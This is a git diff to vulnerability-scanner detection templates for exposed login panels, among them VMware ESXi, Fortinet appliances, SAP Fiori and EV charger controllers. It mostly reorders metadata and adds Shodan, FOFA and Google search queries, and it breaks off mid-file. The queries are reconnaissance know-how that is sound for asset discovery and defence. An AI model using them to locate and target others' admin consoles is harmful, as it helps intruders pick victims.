a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -11,12 +11,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:dzzoffice:dzzoffice:*:*:*:*:*:*:*:* metadata: - fofa-query: title="dzzoffice" + verified: true max-request: 1 + vendor: dzzoffice product: dzzoffice shodan-query: http.favicon.hash:-1961736892 - vendor: dzzoffice - verified: true + fofa-query: + - title="dzzoffice" + - icon_hash=-1961736892 tags: panel,dzzoffice,install http: diff --git a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml index b43211cc4a..58da9e2810 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml @@ -9,9 +9,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.favicon.hash:-1961736892 - verified: true + product: dzzoffice + vendor: dzzoffice + fofa-query: + - title="dzzoffice" + - icon_hash=-1961736892 tags: dzzoffice,panel http: diff --git a/http/exposed-panels/e-mobile-panel.yaml b/http/exposed-panels/e-mobile-panel.yaml index a8478f1f9e..6d2d6f80cc 100644 --- a/http/exposed-panels/e-mobile-panel.yaml +++ b/http/exposed-panels/e-mobile-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.html:"E-Mobile " - verified: true tags: panel,e-mobile http: diff --git a/http/exposed-panels/eMerge-panel.yaml b/http/exposed-panels/eMerge-panel.yaml index 5fe66b3470..0be5836a6c 100644 --- a/http/exposed-panels/eMerge-panel.yaml +++ b/http/exposed-panels/eMerge-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: linear_emerge_essential_firmware - shodan-query: http.title:"eMerge" - vendor: nortekcontrol verified: true + max-request: 1 + vendor: nortekcontrol + product: linear_emerge_essential_firmware + shodan-query: + - http.title:"eMerge" + - http.title:"emerge" + fofa-query: title="emerge" + google-query: intitle:"emerge" tags: panel,emerge,nortek,nortekcontrol http: diff --git a/http/exposed-panels/earcu-panel.yaml b/http/exposed-panels/earcu-panel.yaml index 6b052bed06..0190ef18de 100644 --- a/http/exposed-panels/earcu-panel.yaml +++ b/http/exposed-panels/earcu-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.earcu.com/products metadata: + verified: "true" max-request: 1 shodan-query: html:'content="eArcu' - verified: "true" tags: panel,earcu,detect http: diff --git a/http/exposed-panels/easyjob-panel.yaml b/http/exposed-panels/easyjob-panel.yaml index 37bf2e096b..02d9c08d2a 100644 --- a/http/exposed-panels/easyjob-panel.yaml +++ b/http/exposed-panels/easyjob-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.en.because-software.com/software/easyjob/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Log in - easyJOB" - verified: true tags: panel,easyjob,login http: diff --git a/http/exposed-panels/easyvista-panel.yaml b/http/exposed-panels/easyvista-panel.yaml index 7429e53e96..5dd53b1e1e 100644 --- a/http/exposed-panels/easyvista-panel.yaml +++ b/http/exposed-panels/easyvista-panel.yaml @@ -1,19 +1,19 @@ id: easyvista-panel -info: - name: EasyVista Login Panel - Detect - author: righettod - severity: info - description: | - EasyVista login panel was detected. - reference: - - https://www.easyvista.com/ - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"Easyvista" - tags: panel,easyvista,login,detect - +info: + name: EasyVista Login Panel - Detect + author: righettod + severity: info + description: | + EasyVista login panel was detected. + reference: + - https://www.easyvista.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Easyvista" + tags: panel,easyvista,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/eclipse-birt-panel.yaml b/http/exposed-panels/eclipse-birt-panel.yaml index 8586bce1e6..8663563562 100644 --- a/http/exposed-panels/eclipse-birt-panel.yaml +++ b/http/exposed-panels/eclipse-birt-panel.yaml @@ -11,10 +11,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Eclipse BIRT Home" + verified: true max-request: 2 shodan-query: title:"Eclipse BIRT Home" - verified: true + google-query: intitle:"Eclipse BIRT Home" tags: panel,eclipsebirt,detect http: diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index 1fd6c668f9..e6d807d9f4 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:o:ui:edgeos:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: edgeos vendor: ui + product: edgeos tags: login,tech,edgeos,edgemax,panel,ui http: diff --git a/http/exposed-panels/efak-login-panel.yaml b/http/exposed-panels/efak-login-panel.yaml index 3a03a2f5b8..d36186bfed 100644 --- a/http/exposed-panels/efak-login-panel.yaml +++ b/http/exposed-panels/efak-login-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/smartloli/efak - https://www.kafka-eagle.org/ metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:1693580324 - verified: true tags: panel,efak,login,detect http: diff --git a/http/exposed-panels/eko-management-console-login.yaml b/http/exposed-panels/eko-management-console-login.yaml index 3a97680038..f6824f19a1 100644 --- a/http/exposed-panels/eko-management-console-login.yaml +++ b/http/exposed-panels/eko-management-console-login.yaml @@ -11,10 +11,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Charger Management Console" + verified: true max-request: 1 shodan-query: http.title:"Charger Management Console" - verified: true + google-query: intitle:"Charger Management Console" tags: panel,eko http: diff --git a/http/exposed-panels/eko-software-update-panel.yaml b/http/exposed-panels/eko-software-update-panel.yaml index d749fced04..d07a8e776e 100644 --- a/http/exposed-panels/eko-software-update-panel.yaml +++ b/http/exposed-panels/eko-software-update-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" max-request: 1 shodan-query: http.title:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" + google-query: intitle:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" tags: panel,eko http: diff --git a/http/exposed-panels/elemiz-network-manager.yaml b/http/exposed-panels/elemiz-network-manager.yaml index c2d4b796b0..77831f8192 100644 --- a/http/exposed-panels/elemiz-network-manager.yaml +++ b/http/exposed-panels/elemiz-network-manager.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Elemiz Network Manager" - verified: true tags: elemiz,manager,login,panel http: diff --git a/http/exposed-panels/emby-panel.yaml b/http/exposed-panels/emby-panel.yaml index 59824ba5be..692abf556c 100644 --- a/http/exposed-panels/emby-panel.yaml +++ b/http/exposed-panels/emby-panel.yaml @@ -14,11 +14,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: emby product: emby shodan-query: http.title:"emby" - vendor: emby - verified: true + fofa-query: title="emby" + google-query: intitle:"emby" tags: panel,emby,oss http: diff --git a/http/exposed-panels/emessage-panel.yaml b/http/exposed-panels/emessage-panel.yaml index 4680f3580a..7c4e6fbe80 100644 --- a/http/exposed-panels/emessage-panel.yaml +++ b/http/exposed-panels/emessage-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="emessage" max-request: 1 + fofa-query: title="emessage" tags: panel,emessage http: diff --git a/http/exposed-panels/emqx-panel.yaml b/http/exposed-panels/emqx-panel.yaml index 28e4a61fa6..8ef86df187 100644 --- a/http/exposed-panels/emqx-panel.yaml +++ b/http/exposed-panels/emqx-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.emqx.io/ metadata: + verified: true max-request: 1 shodan-query: http.title:"EMQX Dashboard" - verified: true tags: panel,emqx,login,detect http: diff --git a/http/exposed-panels/ems-webclient-panel.yaml b/http/exposed-panels/ems-webclient-panel.yaml index 03f94ee5ac..5e819fc243 100644 --- a/http/exposed-panels/ems-webclient-panel.yaml +++ b/http/exposed-panels/ems-webclient-panel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: inurl:EMSWebClient/ max-request: 2 + google-query: inurl:EMSWebClient/ tags: panel,ems http: diff --git a/http/exposed-panels/eos-http-browser.yaml b/http/exposed-panels/eos-http-browser.yaml index 15abd0d391..9a8382515c 100644 --- a/http/exposed-panels/eos-http-browser.yaml +++ b/http/exposed-panels/eos-http-browser.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=634930085344181&set=pcb.634929508677572 metadata: + verified: true max-request: 2 shodan-query: title:"EOS HTTP Browser" - verified: true tags: exposure,eos,httpbrowser,panel http: diff --git a/http/exposed-panels/episerver-panel.yaml b/http/exposed-panels/episerver-panel.yaml index 430b0ac630..515a4aa64a 100644 --- a/http/exposed-panels/episerver-panel.yaml +++ b/http/exposed-panels/episerver-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"epihash" - verified: true tags: panel,optimizely,episerver http: diff --git a/http/exposed-panels/epson-projector-detect.yaml b/http/exposed-panels/epson-projector-detect.yaml index 70a2535b5d..5ef76ee09e 100644 --- a/http/exposed-panels/epson-projector-detect.yaml +++ b/http/exposed-panels/epson-projector-detect.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: cgi-bin/webconf.exe max-request: 1 + fofa-query: cgi-bin/webconf.exe tags: iot,projector,panel,unauth,epson http: diff --git a/http/exposed-panels/eset-protect-panel.yaml b/http/exposed-panels/eset-protect-panel.yaml index f72761ffe7..45a3abe42d 100644 --- a/http/exposed-panels/eset-protect-panel.yaml +++ b/http/exposed-panels/eset-protect-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:751911084 - verified: true tags: login,eset,panel,detect http: diff --git a/http/exposed-panels/esphome-panel.yaml b/http/exposed-panels/esphome-panel.yaml index 351cee5200..6f216bb625 100644 --- a/http/exposed-panels/esphome-panel.yaml +++ b/http/exposed-panels/esphome-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:esphome:esphome:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: esphome - shodan-query: title:"Login - ESPHome" - vendor: esphome verified: true + max-request: 1 + vendor: esphome + product: esphome + shodan-query: + - title:"Login - ESPHome" + - http.title:"login - esphome" + fofa-query: title="login - esphome" + google-query: intitle:"login - esphome" tags: panel,esphome,iot http: diff --git a/http/exposed-panels/esxi-system.yaml b/http/exposed-panels/esxi-system.yaml index 904b79daa0..9737b4acc6 100644 --- a/http/exposed-panels/esxi-system.yaml +++ b/http/exposed-panels/esxi-system.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:o:vmware:esxi:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: esxi - shodan-query: html:"esxUiApp" vendor: vmware + product: esxi + shodan-query: + - html:"esxUiApp" + - http.html:"esxuiapp" + - cpe:"cpe:2.3:o:vmware:esxi" + fofa-query: body="esxuiapp" tags: panel,esxi,vmware http: diff --git a/http/exposed-panels/eventum-panel.yaml b/http/exposed-panels/eventum-panel.yaml index 44a44b21c8..27a9519d91 100644 --- a/http/exposed-panels/eventum-panel.yaml +++ b/http/exposed-panels/eventum-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:mysql:eventum:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: mysql product: eventum shodan-query: http.favicon.hash:305412257 - vendor: mysql - verified: true + fofa-query: icon_hash=305412257 tags: panel,eventum,mysql http: diff --git a/http/exposed-panels/evlink/evlink-panel.yaml b/http/exposed-panels/evlink/evlink-panel.yaml index 512e4081a8..61399164c6 100644 --- a/http/exposed-panels/evlink/evlink-panel.yaml +++ b/http/exposed-panels/evlink/evlink-panel.yaml @@ -5,10 +5,10 @@ info: author: ritikchaddha severity: info metadata: - fofa-query: title="EVlink Local Controller" + verified: true max-request: 1 shodan-query: title:"EVlink Local Controller" - verified: true + fofa-query: title="EVlink Local Controller" tags: panel,evlink,login,detect http: diff --git a/http/exposed-panels/evlink/evse-web-panel.yaml b/http/exposed-panels/evlink/evse-web-panel.yaml index 0bff8e7844..f9647a3013 100644 --- a/http/exposed-panels/evlink/evse-web-panel.yaml +++ b/http/exposed-panels/evlink/evse-web-panel.yaml @@ -7,12 +7,17 @@ info: classification: cpe: cpe:2.3:o:schneider-electric:evlink_charging_station_firmware:*:*:*:*:*:*:*:* metadata: - fofa-query: title="EVSE Web Interface" - max-request: 2 - product: evlink_charging_station_firmware - shodan-query: title:"EVSE Web Interface" - vendor: schneider-electric verified: true + max-request: 2 + vendor: schneider-electric + product: evlink_charging_station_firmware + shodan-query: + - title:"EVSE Web Interface" + - http.title:"evse web interface" + fofa-query: + - title="EVSE Web Interface" + - title="evse web interface" + google-query: intitle:"evse web interface" tags: panel,evlink,evse,login,detect,schneider-electric http: diff --git a/http/exposed-panels/ewm-manager-panel.yaml b/http/exposed-panels/ewm-manager-panel.yaml index 2f22bacf8f..31c146ca47 100644 --- a/http/exposed-panels/ewm-manager-panel.yaml +++ b/http/exposed-panels/ewm-manager-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"EWM Manager" - verified: true tags: ewm,manager,login,panel http: diff --git a/http/exposed-panels/exagrid-manager-panel.yaml b/http/exposed-panels/exagrid-manager-panel.yaml index eee45891d4..8293e5702a 100644 --- a/http/exposed-panels/exagrid-manager-panel.yaml +++ b/http/exposed-panels/exagrid-manager-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:exagrid:backup_appliance:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: backup_appliance - shodan-query: title:"ExaGrid Manager" - vendor: exagrid verified: true + max-request: 1 + vendor: exagrid + product: backup_appliance + shodan-query: + - title:"ExaGrid Manager" + - http.title:"exagrid manager" + fofa-query: title="exagrid manager" + google-query: intitle:"exagrid manager" tags: exagrid,manager,login,panel http: diff --git a/http/exposed-panels/exolis-engage-panel.yaml b/http/exposed-panels/exolis-engage-panel.yaml index c1f4f07e00..19e2b18260 100644 --- a/http/exposed-panels/exolis-engage-panel.yaml +++ b/http/exposed-panels/exolis-engage-panel.yaml @@ -11,10 +11,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"engage - Portail soignant" + verified: true max-request: 1 shodan-query: html:"engage - Portail soignant" - verified: true + google-query: intitle:"engage - Portail soignant" tags: panel,exolis,engage http: diff --git a/http/exposed-panels/exposed-webalizer.yaml b/http/exposed-panels/exposed-webalizer.yaml index 4003614fe6..b05b203bc7 100644 --- a/http/exposed-panels/exposed-webalizer.yaml +++ b/http/exposed-panels/exposed-webalizer.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intext:"webalizer" intext:"Usage Statistics for" - max-request: 1 verified: true + max-request: 1 + google-query: intext:"webalizer" intext:"Usage Statistics for" tags: panel,webalizer,edb http: diff --git a/http/exposed-panels/extron-cms-panel.yaml b/http/exposed-panels/extron-cms-panel.yaml index b0beafeb6f..2793b1e979 100644 --- a/http/exposed-panels/extron-cms-panel.yaml +++ b/http/exposed-panels/extron-cms-panel.yaml @@ -10,12 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ektron:ektron_content_management_system:*:*:*:*:*:*:*:* metadata: - fofa-query: app="Ektron-CMS" - max-request: 1 - product: ektron_content_management_system - shodan-query: http.html:"Ektron" - vendor: ektron verified: true + max-request: 1 + vendor: ektron + product: ektron_content_management_system + shodan-query: + - http.html:"Ektron" + - http.html:"ektron" + - cpe:"cpe:2.3:a:ektron:ektron_content_management_system" + fofa-query: + - app="Ektron-CMS" + - app="ektron-cms" + - body="ektron" tags: panel,ektron,cms http: diff --git a/http/exposed-panels/ez-publish-panel.yaml b/http/exposed-panels/ez-publish-panel.yaml index 6c21e598ec..ad22492a34 100644 --- a/http/exposed-panels/ez-publish-panel.yaml +++ b/http/exposed-panels/ez-publish-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"eZ Publish" - verified: true tags: panel,ez http: diff --git a/http/exposed-panels/f-secure-policy-manager.yaml b/http/exposed-panels/f-secure-policy-manager.yaml index b0084a5eab..6ae7ac46be 100644 --- a/http/exposed-panels/f-secure-policy-manager.yaml +++ b/http/exposed-panels/f-secure-policy-manager.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:withsecure:f-secure_policy_manager:*:*:*:*:windows:*:*:* metadata: max-request: 1 - product: f-secure_policy_manager - shodan-query: http.title:"F-Secure Policy Manager Server" vendor: withsecure + product: f-secure_policy_manager + shodan-query: + - http.title:"F-Secure Policy Manager Server" + - http.title:"f-secure policy manager server" + fofa-query: title="f-secure policy manager server" + google-query: intitle:"f-secure policy manager server" tags: login,panel,withsecure http: diff --git a/http/exposed-panels/f5-admin-interface.yaml b/http/exposed-panels/f5-admin-interface.yaml index 9a465fae78..7bc09c4cf4 100644 --- a/http/exposed-panels/f5-admin-interface.yaml +++ b/http/exposed-panels/f5-admin-interface.yaml @@ -7,8 +7,8 @@ info: description: | Detects F5 Admin Interfaces. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"BIG-IP Configuration Utility" tags: f5,admin,detect,panel,login diff --git a/http/exposed-panels/fastpanel-hosting-control-panel.yaml b/http/exposed-panels/fastpanel-hosting-control-panel.yaml index 988de7f31e..9ab7a7a91b 100644 --- a/http/exposed-panels/fastpanel-hosting-control-panel.yaml +++ b/http/exposed-panels/fastpanel-hosting-control-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"FASTPANEL HOSTING CONTROL" - verified: true tags: panel,fastpanel http: diff --git a/http/exposed-panels/filebrowser-login-panel.yaml b/http/exposed-panels/filebrowser-login-panel.yaml index 661e69c2d7..2cb717044b 100644 --- a/http/exposed-panels/filebrowser-login-panel.yaml +++ b/http/exposed-panels/filebrowser-login-panel.yaml @@ -9,11 +9,12 @@ info: classification: cpe: cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 3 + vendor: filebrowser product: filebrowser shodan-query: http.favicon.hash:1052926265 - vendor: filebrowser - verified: true + fofa-query: icon_hash=1052926265 tags: panel,filebrowser,detect http: diff --git a/http/exposed-panels/fiori-launchpad.yaml b/http/exposed-panels/fiori-launchpad.yaml index 6d1be7c276..5db3401aa6 100644 --- a/http/exposed-panels/fiori-launchpad.yaml +++ b/http/exposed-panels/fiori-launchpad.yaml @@ -12,11 +12,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sap:fiori_launchpad:*:*:*:*:*:*:*:* metadata: - google-query: sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com - max-request: 1 - product: fiori_launchpad - vendor: sap verified: true + max-request: 1 + vendor: sap + product: fiori_launchpad + google-query: + - sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com + - sap/bc/ui5_ui5/ui2/ushell/shells/abap/fiorilaunchpad.html -site:sap.com tags: sap,fiori,edb,panel http: diff --git a/http/exposed-panels/fiorilaunchpad-logon.yaml b/http/exposed-panels/fiorilaunchpad-logon.yaml index 505d9a61fa..7071ecc9a7 100644 --- a/http/exposed-panels/fiorilaunchpad-logon.yaml +++ b/http/exposed-panels/fiorilaunchpad-logon.yaml @@ -13,8 +13,9 @@ info: cpe: cpe:2.3:a:sap:fiori_launchpad:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: fiori_launchpad vendor: sap + product: fiori_launchpad + google-query: sap/bc/ui5_ui5/ui2/ushell/shells/abap/fiorilaunchpad.html -site:sap.com tags: panel,edb,sap http: diff --git a/http/exposed-panels/fireware-xtm-user-authentication.yaml b/http/exposed-panels/fireware-xtm-user-authentication.yaml index 59638c3d4c..e17dffed2d 100644 --- a/http/exposed-panels/fireware-xtm-user-authentication.yaml +++ b/http/exposed-panels/fireware-xtm-user-authentication.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:watchguard:fireware_xtm:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: fireware_xtm - shodan-query: http.title:"Fireware XTM User Authentication" vendor: watchguard + product: fireware_xtm + shodan-query: + - http.title:"Fireware XTM User Authentication" + - http.title:"fireware xtm user authentication" + fofa-query: title="fireware xtm user authentication" + google-query: intitle:"fireware xtm user authentication" tags: panel,watchguard http: diff --git a/http/exposed-panels/flahscookie-superadmin-panel.yaml b/http/exposed-panels/flahscookie-superadmin-panel.yaml index f2e6e1cad3..d70f473f0c 100644 --- a/http/exposed-panels/flahscookie-superadmin-panel.yaml +++ b/http/exposed-panels/flahscookie-superadmin-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Flahscookie Superadmin" - verified: true tags: panel,flahscookie,superadmin http: diff --git a/http/exposed-panels/flink-exposure.yaml b/http/exposed-panels/flink-exposure.yaml index 5f85667f29..21f2603f95 100644 --- a/http/exposed-panels/flink-exposure.yaml +++ b/http/exposed-panels/flink-exposure.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: flink vendor: apache + product: flink tags: panel,apache,flink http: diff --git a/http/exposed-panels/flip-cms-panel.yaml b/http/exposed-panels/flip-cms-panel.yaml index 82d3a8adf5..19cf41e6c8 100644 --- a/http/exposed-panels/flip-cms-panel.yaml +++ b/http/exposed-panels/flip-cms-panel.yaml @@ -12,8 +12,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,flip,cms http: diff --git a/http/exposed-panels/flureedb-admin-console.yaml b/http/exposed-panels/flureedb-admin-console.yaml index 2c3dd935c2..aa7c7d8ed3 100644 --- a/http/exposed-panels/flureedb-admin-console.yaml +++ b/http/exposed-panels/flureedb-admin-console.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"FlureeDB Admin Console" - verified: true tags: panel,flureedb http: diff --git a/http/exposed-panels/footprints-panel.yaml b/http/exposed-panels/footprints-panel.yaml index 1e6d23d686..6fd3e55d3e 100644 --- a/http/exposed-panels/footprints-panel.yaml +++ b/http/exposed-panels/footprints-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"FootPrints Service Core Login" - verified: true tags: tech,panel,footprints http: diff --git a/http/exposed-panels/forcepoint.yaml b/http/exposed-panels/forcepoint.yaml index 8b46c42de7..b89490b157 100644 --- a/http/exposed-panels/forcepoint.yaml +++ b/http/exposed-panels/forcepoint.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:forcepoint:email_security:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: email_security vendor: forcepoint + product: email_security tags: forcepoint,panel,login http: diff --git a/http/exposed-panels/forti/fortiadc-panel.yaml b/http/exposed-panels/forti/fortiadc-panel.yaml index aa17899a86..1c34a9c066 100644 --- a/http/exposed-panels/forti/fortiadc-panel.yaml +++ b/http/exposed-panels/forti/fortiadc-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortiadc - shodan-query: title:"FortiADC" - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortiadc + shodan-query: + - title:"FortiADC" + - http.title:"fortiadc" + fofa-query: title="fortiadc" + google-query: intitle:"fortiadc" tags: panel,fortinet http: diff --git a/http/exposed-panels/fortinet/f5-next-central-manager.yaml b/http/exposed-panels/fortinet/f5-next-central-manager.yaml index 85944c6335..e82789c3e1 100644 --- a/http/exposed-panels/fortinet/f5-next-central-manager.yaml +++ b/http/exposed-panels/fortinet/f5-next-central-manager.yaml @@ -17,7 +17,7 @@ info: max-request: 1 vendor: f5 product: big-ip - tags: panel,fortinet,login + tags: panel,fortinet,login,f5 http: - method: GET diff --git a/http/exposed-panels/fortinet/fortiap-panel.yaml b/http/exposed-panels/fortinet/fortiap-panel.yaml index 4f3e294b49..e8d5ed7684 100644 --- a/http/exposed-panels/fortinet/fortiap-panel.yaml +++ b/http/exposed-panels/fortinet/fortiap-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortiap:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: fortiap - shodan-query: title:"FortiAP" - vendor: fortinet verified: true + max-request: 1 + vendor: fortinet + product: fortiap + shodan-query: + - title:"FortiAP" + - http.title:"fortiap" + fofa-query: title="fortiap" + google-query: intitle:"fortiap" tags: panel,fortinet,fortiap http: diff --git a/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml b/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml index 1b5b530b4d..52256034c1 100644 --- a/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml +++ b/http/exposed-panels/fortinet/fortiauthenticator-detect.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortiauthenticator:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: fortinet product: fortiauthenticator shodan-query: http.favicon.hash:-1653412201 - vendor: fortinet - verified: true + fofa-query: icon_hash=-1653412201 tags: panel,fortinet,fortiauthenticator,detect http: diff --git a/http/exposed-panels/fortinet/forticlientems-panel.yaml b/http/exposed-panels/fortinet/forticlientems-panel.yaml index 50ba953014..6da792e2d5 100644 --- a/http/exposed-panels/fortinet/forticlientems-panel.yaml +++ b/http/exposed-panels/fortinet/forticlientems-panel.yaml @@ -5,9 +5,9 @@ info: author: h4sh5 severity: info metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-800551065 - verified: true tags: panel,fortinet,forticlient,ems,login,detect http: diff --git a/http/exposed-panels/fortinet/fortimail-panel.yaml b/http/exposed-panels/fortinet/fortimail-panel.yaml index 974a001ce3..080406cb6c 100644 --- a/http/exposed-panels/fortinet/fortimail-panel.yaml +++ b/http/exposed-panels/fortinet/fortimail-panel.yaml @@ -10,11 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* metadata: - fofa-query: Fortimail && port=443 max-request: 1 - product: fortimail - shodan-query: title:"Fortimail" vendor: fortinet + product: fortimail + shodan-query: + - title:"Fortimail" + - http.title:"fortimail" + fofa-query: + - Fortimail && port=443 + - fortimail && port=443 + - title="fortimail" + google-query: intitle:"fortimail" tags: panel,fortinet,fortimail,login http: diff --git a/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml index e2f2071d91..a7955c2491 100644 --- a/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml @@ -11,11 +11,15 @@ info: classification: cpe: 